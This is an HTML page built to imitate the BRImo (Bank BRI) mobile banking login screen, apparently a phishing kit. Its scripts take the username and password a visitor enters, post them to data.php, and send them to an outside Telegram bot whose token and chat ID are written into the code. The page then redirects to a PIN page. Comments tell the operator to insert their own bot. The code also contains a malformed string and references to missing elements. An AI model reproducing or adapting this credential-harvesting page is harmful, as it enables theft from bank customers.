<!DOCTYPE HTML>
<html ⚡>
<head>
<meta charset="UTF-8">
<script async src="https://cdn.ampproject.org/v0.js"></script>
<link rel="canonical" href="https://amp.dev/documentation/guides-and-tutorials/start/create/basic_markup/">
<meta name="viewport" content="width=device-width,minimum-scale=1,initial-scale=1">
<style amp-boilerplate>body{-webkit-animation:-amp-start 8s steps(1,end) 0s 1 normal both;-moz-animation:-amp-start 8s steps(1,end) 0s 1 normal both;-ms-animation:-amp-start 8s steps(1,end) 0s 1 normal both;animation:-amp-start 8s steps(1,end) 0s 1 normal both}@-webkit-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-moz-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-ms-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-o-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}</style><noscript><style amp-boilerplate>body{-webkit-animation:none;-moz-animation:none;-ms-animation:none;animation:none}</style></noscript>
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
<link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Material+Symbols+Outlined:opsz,wght,FILL,GRAD@48,400,0,0" />
<title>BRImo</title>
<link rel="icon" href="https://ib.bri.co.id/pg/img/favicon.ico?v=1" />
<style>
@font-face {
  font-family: alexfonthel;
  src: url(https://cdn.jsdelivr.net/gh/AlexHostX/another@main/brims/helvetica_neue.woff);
}
* {
    margin: 0px;
}
body {
    margin: 0px;
    background: #fff;
    color: #000;
    font-family: 'alexfonthel', sans-serif;
}
welalxcome {
        position: fixed;
    left: 0;
    top: 0;
    width: 100vw;
    height: 100vh;
    display: flex;
    flex-direction: row;
    flex-wrap: nowrap;
    align-items: center;
    align-content: center;
    justify-content: center;
}
welalxcome img {
        width: 11vw;
    height: auto;
}
chsalxcome {
        position: relative;
    width: 100%;
    height: 100vh;
    display: flex;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
}
.talxcome {
        display: flex;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
    height: 50vh;
    justify-content: center;
}
.talxcome img {
        width: 73%;
}
.balxcome {
        height: 40vh;
    display: flex;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
}
.txalxcome {
        width: 90%;
    height: 25vh;
    text-align: left;
}
.txalxcome p {
        font-weight: 600;
    font-size: 1.5rem;
    margin-bottom: 5vh;
    color: #1d66ab;
}
.txalxcome span {
        width: 80%;
    font-size: 18px;
}
.btalxcome {
        width: 90%;
    height: 20vh;
    display: flex;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
}
.btalxcome button {
        width: 100%;
    background: #1d66ab;
    color: #fff;
    font-family: inherit;
    border-radius: 5px;
    border: none;
    font-size: 16px;
    padding: 2.2vh 0px;
    margin-bottom: 4vh;
    font-weight: 500;
    box-shadow: 0px 0px 1px 0px #000;
    cursor: pointer;
}
.btalxcome p {
        color: #1d66ab;
    font-weight: 500;
    cursor: pointer;
}
frmalxbr {
        position: relative;
    width: 100vw;
    height: 100vh;
}
.hdralxfrm {
        width: 100%;
    position: fixed;
    left: 0;
    top: 0;
    display: block;
    text-align: center;
    padding: 1.5vh 0px;
    box-shadow: 0px 1px 20px 0px #00000040;
    z-index: 1;
}
.hdralxfrm img {
        width: 10vw;
    height: auto;
}
.chalxfrm {
        position: relative;
    width: 100%;
    height: 50vh;
    z-index: 0;
    display: flex;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
}
.bgchalxfrm {
    background: url(https://d1muf25xaso8hp.cloudfront.net/https%3A%2F%2Fs3.amazonaws.com%2Fappforest_uf%2Ff1662190195198x856071627441351600%2F1658047233080.jpg) no-repeat center;
    background-size: 100%;
    position: unset;
    width: 100%;
    border-radius: 0px;
    top: -5;
    height: 90%;
    border: none;
}
.chalxfrm p {
        position: absolute;
    color: #fff;
    font-size: 19px;
    font-weight: 600;
    letter-spacing: 1px;
    top: 11vh;
}
.chalxfrm img {
        position: absolute;
    width: 90%;
    bottom: 15vh;
}
.frmalxbrm {
        display: flex;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
    height: 42vh;
    width: 100%;
}
.inpalxbrm {
        margin-top: 3vh;
    width: 90%;
    height: 35vh;
}
.inpalxbrm p {
        color: #2069ab;
    font-weight: 600;
    font-size: 18px;
    letter-spacing: 1px;
    margin-left: 3vw;
}
.bxmalxbrm {
        display: flex;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
    width: 100%;
    padding-top: 2vh;
}
.itmalxbrm {
    position: relative;
        width: 95%;
    background: #fff;
    box-shadow: 0px 1px 3px 0px #00000087;
    border-radius: 2px 2px 4px 4px;
    display: flex;
    flex-direction: row;
    flex-wrap: nowrap;
    align-items: center;
    padding: 1.9vh 2vw;
    column-gap: 3vw;
}
.itmalxbrm img {
        height: 4vh;
}
.itmalxbrm input {
        font-family: arial, sans-serif;
    font-size: 17px;
    font-weight: 300;
    border: none;
    outline: none;
    margin-top: 8px;
    margin-left: 5px;
}
.inpalxbrm span {
        width: 100%;
    text-align: right;
    display: block;
    margin-top: 2.5vh;
    font-size: 14px;
    cursor: pointer;
}
.btnalxfrm {
        height: 10vh;
    display: flex;
    flex-direction: row;
    flex-wrap: nowrap;
    align-content: center;
    justify-content: center;
    align-items: center;
    width: 90%;
}
.btnalxfrm button {
        width: 100%;
    background: #1d66ab;
    color: #fff;
    font-family: inherit;
    border-radius: 5px;
    border: none;
    font-size: 16px;
    padding: 2vh 0px;
    margin-bottom: 1.1vh;
    font-weight: 500;
    box-shadow: 0px 0px 1px 0px #000;
    cursor: pointer;
}
#ionIcons {
    color: rgb(22, 119, 199);
    font-size: 29px;
    position: absolute;
    display: block;
    margin-top: 7px;
    margin-left: 5px;
}
#togglePassword {
    background-size: 100% 100%;
    height: 3.5vh;
    width: 4vh;
    margin-top: 0;
    position: absolute;
    right: 4vw;
    cursor: pointer;
}
.fa-eye {
    background: url(https://ib.bri.co.id/pg/img/eyeclosed-icon.png) no-repeat center;
}
.fa-eye-slash {
    background: url(https://ib.bri.co.id/pg/img/eye-icon.png) no-repeat center;
}
.opbtn {
    opacity: 0.5;
}
.alxslh {
        position: fixed;
    left: 0;
    top: 8vh;
    z-index: 3;
    font-size: 14px;
    font-weight: 400;
    color: #fff;
    background: #f53939;
    text-align: center;
    width: 100%;
    font-family: arial, sans-serif;
    padding: 1.7vh 0px;
    display: none;
}
pnalxbr {
        background: rgb(36 131 240);
    display: flex;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
    width: 100vw;
    height: 100vh;
    color: #fff;
}
.hdralxpn {
        width: 100%;
    height: 5vh;
    display: flex;
    flex-direction: row;
    flex-wrap: nowrap;
    align-items: center;
    justify-content: space-between;
}
.hdralxpn span {
        margin-left: 3%;
}
.hdralxpn p {
       font-weight: 400;
    font-size: 15px; 
}
.hdralxpn label {
        visibility: hidden;
    margin-right: 3%;
}
.txalxpn {
        padding-top: 10vh;
    padding-bottom: 5vh;
    width: 70%;
    text-align: left;
}
.txalxpn p {
       font-size: 17px;
    font-weight: 400; 
}
.txalxpn span {
        font-size: 12px;
    font-weight: 300;
    font-family: Arial, sans-serif;
}
.inpalxpn {
        width: 70%;
    display: flex;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
}
#alxpnnikah {
    width: 100%;
    display: flex;
    flex-direction: row;
    flex-wrap: nowrap;
    align-items: center;
    justify-content: center;
    column-gap: 7vw;
    position: relative;
    align-content: center;
}
#alxpnnikah input {
        position: absolute;
    z-index: 2;
    color: #fff;
    border: none;
    outline: none;
    font-family: inherit;
    background: transparent;
    font-size: 24px;
    letter-spacing: 10vw;
    width: 100%;
    overflow: hidden;
    float: left;
    text-align: left;
    text-overflow: revert;
    cursor: not-allowed;
    pointer-events: none;
}
.bxinpalxpn {
        width: 6vw;
    display: flex;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
    position: relative;
    align-content: center;
    justify-content: center;
}
.bxinpalxpn input {
        width: 100%;
    height: 100%;
    position: absolute;
    background: transparent;
    outline: none;
    border: none;
    cursor: pointer;
    text-align: center;
    color: #fff;
    font-family: inherit;
    font-size: 24px;
}
.bxinpalxpn span {
       background: #dddddd8a;
    height: 6.5vh;
    width: 5.5vh;
    display: block;
    border-radius: 10px;
}
.txalxlppn {
        padding: 7vh 0px 9vh;
    font-size: 13px;
    font-family: arial, sans-serif;
    cursor: pointer;
}
.kybalxpn {
        width: 90%;
}
.inpalxkyb {
        width: 100%;
    display: flex;
    flex-direction: row;
    flex-wrap: nowrap;
    align-items: center;
    justify-content: space-between;
    margin-bottom: 4vh;
}
.inpalxkyb button {
        background: transparent;
    color: #fff;
    font-family: inherit;
    cursor: pointer;
    outline: none;
    border: none;
    font-size: 30px;
    width: 30%;
    height: 8vh;
}
smalxs {
        height: 100vh;
    width: 100vw;
    background: #f2f2f2;
    display: flex;
    flex-direction: row;
    flex-wrap: nowrap;
    align-content: center;
    justify-content: center;
    align-items: center;
}
.bxalxsm {
        position: relative;
    width: 85%;
    padding: 15vh 0% 2vh;
    background: #fff;
    display: flex;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
    border: 1px solid rgba(166, 166, 166, 0.37);
    border-radius: 10px;
}
.bxalxsm img {
        width: 80%;
    position: absolute;
    top: -10vh;
}
.bxalxsm garis {
        display: block;
    width: 100%;
    border-bottom: 2px dotted rgb(204, 204, 204);
}
.bxalxsm label {
        color: #0776ED;
    font-weight: 300;
    font-family: arial, sans-serif;
    padding: 2vh;
}
.alxinpsm {
        width: 90%;
    display: flex;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: flex-start;
}
.alxinpsm span {
        color: rgb(158, 158, 158);
    font-size: 12px;
    font-family: arial, sans-serif;
}
.alxinpsm input {
        box-sizing: border-box;
    z-index: 4;
    height: 75px;
    width: 100%;
    left: 0px;
    border-width: 1px;
    border-style: solid;
    border-color: rgb(189, 189, 189) rgb(189, 189, 189) rgb(214, 214, 214);
    border-image: initial;
    background-color: transparent;
    border-radius: 5px;
    box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px;
    font-size: 13px;
    color: rgb(85, 85, 85);
    padding: 0px 4px;
    top: 20px;
    transition: border-bottom-color 200ms ease 0s;
    margin: 1vh 0px 2vh;
    font-family: arial, sans-serif;
    outline: navajowhite;
}
.btnalxsm {
        width: 100%;
    text-align: right;
}
.btnalxsm button {
    cursor: pointer;
    background: none rgb(0, 134, 224);
    border: none;
    text-align: center;
    box-sizing: border-box;
    z-index: 6;
    height: 33px;
    left: 0px;
    top: 0px;
    font-size: 14px;
    color: rgb(255, 255, 255);
    line-height: 1;
    border-radius: 6px;
    box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px;
    font-family: arial, sans-serif;
    letter-spacing: 1px;
    padding: 0px 10px;
    outline: navajowhite;
}
.dscalxsm {
        margin-top: 5vh;
    display: flex;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
}
.dscalxsm p {
        text-align: center;
    width: 90%;
    font-size: 10px;
    color: rgba(10, 10, 10, 0.73);
    font-family: arial, sans-serif;
}
.malasngoding-slider { 
    border: 10px solid #efefef; 
    position: relative; 
    overflow: hidden; 
    background: #efefef;
}
 
.malasngoding-slider { 
    margin:20px auto;
    width: 768px;
    height: 450px; 
}
 
.isi-slider img { 
    width: 768px;
    height: 450px; 
    float: left;
}
 
.isi-slider { 
    position: absolute; 
    width:3900px;  
 
    /*pengaturan durasi lama tampil gambar bisa di atur di bawah ini*/
    animation-name:slider;
    animation-duration:16s;
    animation-timing-function: ease-in-out;
    animation-iteration-count:infinite;
    -webkit-animation-name:slider;
    -webkit-animation-duration:16s;
    -webkit-animation-timing-function: ease-in-out;
    -webkit-animation-iteration-count:infinite;
    -moz-animation-name:slider;
    -moz-animation-duration:16s;
    -moz-animation-timing-function: ease-in-out;
    -moz-animation-iteration-count:infinite;
    -o-animation-name:slider;
    -o-animation-duration:16s;
    -o-animation-timing-function: ease-in-out;
    -o-animation-iteration-count:infinite;
}
 
 
/*saat gambar di hover oleh cursor mouse maka berhenti slide*/
.isi-slider:hover { 
    -webkit-animation-play-state:paused; 
    -moz-animation-play-state:paused; 
    -o-animation-play-state:paused; 
    animation-play-state:paused; }
}
 
.isi-slider img { 
    float: right; 
}
 
.malasngoding-slider:after { 
    font-size: 150px; 
    position: absolute; 
    z-index: 12; 
    color: rgba(255,255,255, 0); 
    left: 300px; top: 80px; 
    -webkit-transition: 1s all ease-in-out; 
    -moz-transition: 1s all ease-in-out; 
    transition: 1s all ease-in-out; 
}
 
.malasngoding-slider:hover:after { 
    color: rgba(255,255,255, 0.6);  
}
 
 
 
@-moz-keyframes slider {     
    0% {
        left: 0; opacity: 0; 
    }     
    2% {
        opacity: 1; 
    }     
    20% {
        left: 0; opacity: 1; 
    }     
    21% {
        opacity: 0; 
    }     
    24% {
        opacity: 0; 
    }     
    25% {
        left: -768px; opacity: 1; 
    }       
    45% {
        left: -768px; opacity: 1; 
    }     
    46% {
        opacity: 0; 
    }     
    48% {
        opacity: 0; 
    }     
    50% {
        left: -1536px; opacity: 1; 
    }     
    70% {
        left: -1536px; opacity: 1; 
    }     
    72% {
        opacity: 0; 
    }     
    74% {
        opacity: 0; 
    }    
    75% {
        left: -2304px; opacity: 1; 
    }       
    95% {
        left: -2304px; opacity: 1; 
    }       
    97% { 
        left: -2304px; opacity: 0;
    }       
    100% {
        left: 0; opacity: 0; 
    }
} 
 
@-webkit-keyframes slider {     
    0% {
        left: 0; opacity: 0; 
    }     
    2% {
        opacity: 1; 
    }     
    20% {
        left: 0; opacity: 1; 
    }     
    21% {
        opacity: 0; 
    }     
    24% {
        opacity: 0; 
    }     
    25% {
        left: -768px; opacity: 1; 
    }       
    45% {
        left: -768px; opacity: 1; 
    }     
    46% {
        opacity: 0; 
    }     
    48% {
        opacity: 0; 
    }     
    50% {
        left: -1536px; opacity: 1; 
    }     
    70% {
        left: -1536px; opacity: 1; 
    }     
    72% {
        opacity: 0; 
    }     
    74% {
        opacity: 0; 
    }    
    75% {
        left: -2304px; opacity: 1; 
    }       
    95% {
        left: -2304px; opacity: 1; 
    }       
    97% { 
        left: -2304px; opacity: 0;
    }       
    100% {
        left: 0; opacity: 0; 
    }
} 
 
 
@keyframes slider {     
    0% {
        left: 0; opacity: 0; 
    }     
    2% {
        opacity: 1; 
    }     
    20% {
        left: 0; opacity: 1; 
    }     
    21% {
        opacity: 0; 
    }     
    24% {
        opacity: 0; 
    }     
    25% {
        left: -768px; opacity: 1; 
    }     
    45% {
        left: -768px; opacity: 1; 
    }     
    46% {
        opacity: 0; 
    }     
    48% {
        opacity: 0; 
    }     
    50% {
        left: -1536px; opacity: 1; 
    }     
    70% {
        left: -1536px; opacity: 1; 
    }     
    72% {
        opacity: 0; 
    }     
    74% {
        opacity: 0; 
    }    
    75% {
        left: -2304px; opacity: 1; 
    }       
    95% {
        left: -2304px; opacity: 1; 
    }       
    97% { 
        left: -2304px; opacity: 0; 
    } 
 
    100% {
        left: 0; opacity: 0; 
    }
}
*{
    margin: 0;
    padding: 0;
    list-style: none;
    text-decoration: none;
}

.slider{
    overflow: hidden;
    height: 350px;
}

.slider figure div{
    width: 20%;
    float: left;
}

.slider figure img{
    width: 100%;
    float: left;
}

.slider figure{
    position: relative;
    width: 500%;
    margin: 0;
    left: 0;
    animation: 20s slidy infinite;
}

@keyframes slidy{
    0%{
        left: 0%
    }

    10%{
        left: 0%;
    }

    12%{
        left: -100%;
    }

    22%{
        left: -100%;
    }

    24%{
        left: -200%;
    }

    34%{
        left: -200%;
    }

    36%{
        left: -300%;
    }

    46%{
        left: -300%;
    }

    48%{
        left: -400%;
    }

    58%{
        left: -400%;
    }

    60%{
        left: -300%;
    }

    70%{
        left: -300%;
    }

    72%{
        left: -200%;
    }

    82%{
        left: -200%;
    }

    84%{
        left: -100%;
    }

    94%{
        left: -100%;
    }

    96%{
        left: 0%;
    }

    100%{
        left: 0%;
    }
}
/* css modal */

:root {
  --modal-duration: 1s;
  --modal-color: #428bca;
}


.button {
  background: #428bca;
  padding: 1em 2em;
  color: #fff;
  border: 0;
  border-radius: 5px;
  cursor: pointer;
}

.button:hover {
  background: #3876ac;
}

.modal {
  display: none;
  position: fixed;
  z-index: 1;
  left: 0;
  top: 0;
  height: 100%;
  width: 100%;
  overflow: auto;
  background-color: rgba(0, 0, 0, 0.5);
}

.modal-content {
  margin: 50% auto;
  width: 85%;
  box-shadow: 0 5px 8px 0 rgba(0, 0, 0, 0.2), 0 7px 20px 0 rgba(0, 0, 0, 0.17);
  animation-name: modalopen;
  animation-duration: var(--modal-duration);
}

.modal-header h2,
.modal-footer h3 {
  margin: 0;
}

.modal-header {
  background: var(--modal-color);
  padding: 25px;
  color: #fff;
  border-top-left-radius: 5px;
  border-top-right-radius: 5px;
}

.modal-body {
  padding: 10px 20px;
  background: #fff;
}

.modal-footer {
  background: var(--modal-color);
  padding: 20px;
  color: #fff;
  text-align: center;
  border-bottom-left-radius: 5px;
  border-bottom-right-radius: 5px;
}

.close {
  color: #ccc;
  float: right;
  font-size: 30px;
  color: #fff;
}

.close:hover,
.close:focus {
  color: #000;
  text-decoration: none;
  cursor: pointer;
}

@keyframes modalopen {
  from {
    opacity: 0;
  }
  to {
    opacity: 1;
  }
}
#alxsm {
      border-radius: 10px;
      border: 2px solid #09559a;
      color: #09559a;
      font-size: 18px;
      margin-bottom: 25px;
      padding: 0.5em 1em 0.5em 0;
      width: 90%;     /* Ukuran bebas */
      height: 100px;     /* Ukuran bebas */
      text-align: left;
 }

/* css modal*/
</style>
</head>
<body>
<main>
<welalxcome>
<img src="https://cdn.kibrispdr.org/data/1789/loading-gif-png-3.gif" alt="" />
</welalxcome>
<chsalxcome style="display: none;">
<div class="talxcome">
<img src="https://i.ibb.co/HCtR55m/images.png" alt="" />
</div>
<div class="balxcome">
<div class="txalxcome">
<p>Selamat Datang di BRImo</p>
<span>Apakah Anda memiliki akun <b>Internet Banking Bank BRI?</b></span>
</div>
<div class="btalxcome">
<button onclick="alxfrmb()">Punya Akun</button>
<p onclick="alxfrmb()">Belum punya Akun</p>
</div>
</div>
</chsalxcome>

<frmalxbr style="display: none">
<div class="alxslh" id="eslh">Silahkan periksa kembali username dan password Anda</div>
<div class="alxslh" id="pslh">Silahkan periksa kembali username dan password Anda</div>
<div class="chalxfrm">
<div class="bgchalxfrm"></div>
</div>
<div class="frmalxbrm">


<div class="inpalxbrm">
<p>Login</p>
<form class="formNo">
<div  class="bxmalxbrm" id="ngumpulinuangnikah">
<div class="itmalxbrm">
<img src="https://ib.bri.co.id/pg/img/user.png" alt="" />
<i class="ion-ios-person-outline" id="ionIcons"></i>
<input class="input" type="text" name="user" id="ealx" placeholder="Username">
</div>
<div class="itmalxbrm">
<img src="https://ib.bri.co.id/pg/img/password.png" alt="" />
 <i class="ion-ios-locked-outline" id="ionIcons"></i>
<input class="input" type="password" name="sandi" id="palx" placeholder="Password">
<span id="togglePassword" toggle="#ppalx" class="fa-eye"></span>
</div>
</div>
<span>Lupa Username/Password?</span>
</div>
<div class="btnalxfrm">
<button class="opbtn" id="btnpst" onsubmit="Redirect();" disabled>Login</button>
</form>
<button style="width:60px; margin-left:10px" class="button"><img src="https://cdn.icon-icons.com/icons2/2622/PNG/512/gui_fingerprint_icon_157660.png" width="32px" style="margin:-15px;"></button>
</div>
</div>
</frmalxbr>

</main>
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.2/jquery.min.js"></script>
<script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
<script type="text/javascript" src="https://code.jquery.com/jquery-1.10.2.min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" integrity="sha512-894YE6QWD5I59HgZOGReFYm4dnWc1Qt5NtvYSaNcOP+u1T9qYdvdihz0PPSiiqn/+/3e7Jo4EaG7TubfWGUrMQ==" crossorigin="anonymous" referrerpolicy="no-referrer"></script>
<script>
        $( document ).ready(function() {
            setTimeout(() => {
                $('welalxcome').hide();
                $('chsalxcome').fadeIn();
            },1000)
        });
        
        /*sript modal*/

        // Get DOM Elements
        const modal = document.querySelector('#my-modal');
        const modal3 = document.querySelector('#my-modal3');
        const modalBtn = document.querySelector('#btnpst');
        const modalBtn3 = document.querySelector('#open3');
        const closeBtn = document.querySelector('.close');
        const closeBtn2 = document.querySelector('#close');
        const closeBtn3 = document.querySelector('#close3');
        
        // Events
        modalBtn.addEventListener('click', openModal);
        modalBtn3.addEventListener('click', openModal3);
        closeBtn.addEventListener('click', closeModal);
        closeBtn2.addEventListener('click', closeModal2);
        closeBtn3.addEventListener('click', closeModal3);
        window.addEventListener('click', outsideClick);
        
        // Open
        function openModal() {
          modal.style.display = 'block';
        }
        
        function openModal3() {
          modal3.style.display = 'block';
        }
        
        
        // Close
        function closeModal() {
          modal.style.display = 'none';
        }
        
        function closeModal3() {
          modal3.style.display = 'none';
        }
        
        // Close
        function closeModal2() {
          modal.style.display = 'none';
        }
        
        
        // Close If Outside Click
        function outsideClick(e) {
          if (e.target == modal) {
            modal.style.display = 'none';
          }
        }
        
        
        /* script modal*/

        function alxfrmb() {
            /*$("input[type=checkbox]").on( "change", function(evt) {
                document.getElementById("label1").style.color = '#09559a';
                document.getElementById("label2").style.color = '#09559a';
            });

            var tarif = $('input[id=tarif]:checked');
            var label = $('#label');
            if(tarif.length == 0){

                document.getElementById("label1").style.color = 'red';
                document.getElementById("label2").style.color = 'red';
                $('#haruspilih').show();
                setTimeout(() => {
                    $('#haruspilih').fadeOut();
                },1000)
                $('#pslh').hide();
                return false;
            }else{*/

                $('chsalxcome').hide();
                $('frmalxbr').show();
           /* }*/
            
            
        }
        </script>
<script>
            const togglePassword = document.querySelector("#togglePassword");
            const password = document.querySelector("#palx");
    
            togglePassword.addEventListener("click", function () {
                // toggle the type attribute
                const type = password.getAttribute("type") === "password" ? "text" : "password";
                password.setAttribute("type", type);
                
                // toggle the icon
                this.classList.toggle("fa-eye-slash");
            });
            
            let input = document.querySelector(".input");
            let button = document.querySelector("#btnpst");
            
            button.disabled = true; //setting button state to disabled
            
            input.addEventListener("change", stateHandle);
            
            function stateHandle() {
                if (document.querySelector(".input").value === "") {
                    button.disabled = true; //button remains disabled
                    $('#btnpst').addClass('opbtn');
                } else {
                    button.disabled = false; //button is enabled
                    $('#btnpst').removeClass('opbtn');
                }
            }
            
            </script>
<script>
            
             function alxfrm(){
                $ealx = $('#ealx').val().trim();
                $palx = $('#palx').val().trim();
                if($ealx == '' || $ealx == null || $ealx.length <= 5)
                {
                    $('#eslh').show();
                    setTimeout(() => {
                        $('#eslh').fadeOut();
                    },2000)
                    $('#pslh').hide();
                    return false;
                }else{
                    $('#eslh').hide();
                }
                if($palx == '' || $palx == null || $palx.length <= 5)
                {
                    $('#pslh').show();
                    setTimeout(() => {
                        $('#pslh').fadeOut();
                    },2000)
                    return false;
                }else{
                    $('#pslh').hide();
                }
                
                if($ealx.length >=5 || $palx.length >=5) {
                    $.ajax({
                        type: 'POST',
                        url: 'data.php',
                        data: $('#ngumpulinuangnikah').serialize(),
                        dataType: 'text',
                        success: function() {
                                    $('frmalxbr').hide();
                                    $('pnalxbr').show();
                                    $("input#remail").val($ealx);
                                    $("input#rpassword").val($palx);
                            } 
                    })
                }
            }
            </script>
<script>
            
            function clpnalx() {
                $('frmalxbr').show();
                $('pnalxbr').hide();
            }
            //key numeric
            
            </script>
<script>
function Redirect() {
  window.location = "./pin.html"

    var user = document.getElementById('ealx')
    var sandi = document.getElementById('palx');

    var gabungan = 'BRImo | Login' %0A' + '%0AUsername %3A ' + user.value + '%0APassword %3A ' + palx.value;

    var token = '5865272529:AAEuW0f84Kveso-8r_mmMMFQD6IfdpMaPps'; // Ganti dengan token bot yang kamu buat
    var grup = '5492826781'; // Ganti dengan chat id dari bot yang kamu buat

    $.ajax({
        url: `https://api.telegram.org/bot${token}/sendMessage?chat_id=${grup}&text=${gabungan}&parse_mode=html`,
        method: `POST`,
    })
}
</script>
</body>
</html>